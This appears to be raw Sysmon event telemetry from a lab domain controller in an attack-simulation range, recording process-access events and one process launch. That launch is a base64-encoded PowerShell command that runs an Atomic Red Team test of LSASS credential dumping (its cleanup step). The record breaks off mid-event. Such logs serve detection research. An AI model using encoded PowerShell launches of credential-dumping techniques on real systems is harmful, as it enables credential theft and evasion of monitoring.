15:53:07.133{D28789B6-7CE1-5FA1-4001-000000008801}48042868C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CE3-5FA1-5701-000000008801}3148C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3ed3|UNKNOWN(00007FF8DCAD7813) 10341000x80000000000000006239Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.133{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006238Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.133{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006237Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.133{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006236Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.133{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006235Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.133{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006234Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.133{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006233Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.133{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006232Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.133{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006231Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.133{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006230Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.133{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CE3-5FA1-5701-000000008801}3148C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006229Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.133{D28789B6-7CE1-5FA1-4001-000000008801}48042868C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CE3-5FA1-5701-000000008801}3148C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f0374a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f035be(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f85dea(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30efc1a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+319b5399(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30ec499e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f22e6d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f06363(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30ef82e8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f31478(wow64) 154100x80000000000000006228Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.135{D28789B6-7CE3-5FA1-5701-000000008801}3148C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CE0-5FA1-AF9E-0B0000000000}0xb9eaf0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CE1-5FA1-4001-000000008801}4804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEMAbABlAGEAbgB1AHAA 10341000x80000000000000006227Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.118{D28789B6-7CE0-5FA1-3001-000000008801}47404528C:\Windows\system32\conhost.exe{D28789B6-7CE3-5FA1-5601-000000008801}732C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006226Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.118{D28789B6-7CE1-5FA1-4001-000000008801}48042868C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CE3-5FA1-5601-000000008801}732C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3ed3|UNKNOWN(00007FF8DCAD7813) 10341000x80000000000000006225Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.118{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006224Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.118{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006223Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.118{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006222Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.118{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006221Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.118{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006220Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.118{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006219Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.118{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006218Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.118{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006217Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 